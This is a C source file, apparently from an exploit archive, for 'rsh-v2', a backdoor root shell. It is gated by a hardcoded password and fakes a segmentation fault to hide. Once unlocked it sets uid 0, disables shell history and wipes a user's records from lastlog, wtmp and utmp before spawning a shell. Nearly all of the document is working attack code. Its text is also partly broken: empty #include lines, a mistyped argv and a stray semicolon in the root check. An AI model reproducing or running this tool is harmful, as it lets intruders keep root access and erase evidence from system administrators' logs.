rsh-v2.c

Unix log cleaner that also checks to see if root is logged in.

/*
rsh-v2 rootshell by rotor http://www.c1zc0.com
irc.efnet.org #c1zc0
usage: ./rshv2
*/

#include
#include
#include
#include
#include
#include
#include
#include

#define PASS "c1zk0"

#define _PATH_LASTLOG "/var/log/lastlog"
#define _WTMP_PATH "/var/log/wtmp"
#define _UTMP_PATH "/var/run/utmp"

int clean_last(char *path, char *user);
int wtmp_clean(char *path, char *user);
void chkr();

int main(int argc, char **argv[])
{
char *pass = argv[1];
char *pazz = PASS;
struct utsname u;
uname(&u);

if(argc < 1){
printf("Segmentation fault (core dumped)\n");
exit(0);
}
if(strcmp(pass, pazz)) {
printf("Segmentation fault (core dumped)\n");
exit(0);
} else {
setuid(0);
setuid(0);
unsetenv("PS1");
unsetenv("HISTFILE");
printf("Cleaning lastlog!\n");
clean_last(_PATH_LASTLOG, argv[2]);
printf("Cleaning WTMP\n");
wtmp_clean(_WTMP_PATH, argv[2]);
printf("Cleaning UTMP\n");
wtmp_clean(_UTMP_PATH, argv[2]);
printf("Checking for root logged in\n");
chkr();
printf("System name: %s, Node Name: %s\n", u.sysname, u.nodename);
printf("Release: %s, Version: %s\n", u.release, u.version);
execl("/bin/bash", "sh", NULL);
}
return 0;
}

int clean_last(char *path, char *user) {
FILE *lastlog_file;
struct passwd *pwd;
struct lastlog lastlog_tmp;
int count=0;

if((lastlog_file = fopen(path, "r+")) == NULL) {
printf("failed to open file %s\n", path);
return 0;
}

if ((pwd = getpwnam(user)) == NULL) {
printf("user %s not found\n", user);
return 0;
}

fseek(lastlog_file, (long)(pwd->pw_uid*sizeof(lastlog_tmp)), SEEK_SET);
bzero((char *)&lastlog_tmp, sizeof(lastlog_tmp));
fwrite((char *)&lastlog_tmp, sizeof(lastlog_tmp), 1, lastlog_file);

fclose(lastlog_file);

printf("%s cleaned!\n", path);

}

int wtmp_clean(char *path, char *user)
{
FILE *uwtmp_file;
struct utmp uwtmp_tmp;
int count=0;

if((uwtmp_file = fopen(path, "r+")) == NULL) {
printf("failed to open file %s\n", path);
return 0;
}

while(fread((char *)&uwtmp_tmp, sizeof(uwtmp_tmp), 1, uwtmp_file) > 0) {
if(strcmp(uwtmp_tmp.ut_name, user) ==0) {
fseek(uwtmp_file, -sizeof(uwtmp_tmp), SEEK_CUR);
bzero(&uwtmp_tmp, sizeof(uwtmp_tmp));
fwrite((char *)&uwtmp_tmp, sizeof(uwtmp_tmp), 1, uwtmp_file);
count++;
}
}

fclose(uwtmp_file);

if(count == 0) {
printf("user %s not found\n", user, path);
}

else printf("%s cleaned!\n", path);

}

void chkr()
{
struct utmp *entry;

int logincount=0, rootcount=0;
setutent();
while ((entry = getutent())!=NULL)
{
if(entry->ut_type != USER_PROCESS)
continue;
logincount++;

if(!strcmp(entry->ut_user, "root"));
{
printf("Caution> root is logged in on %s!\n", entry->ut_line);
rootcount++;
}
}
printf("-> %d user(s) logged in, %d root login(s)\n", logincount, rootcount);
endutent();

}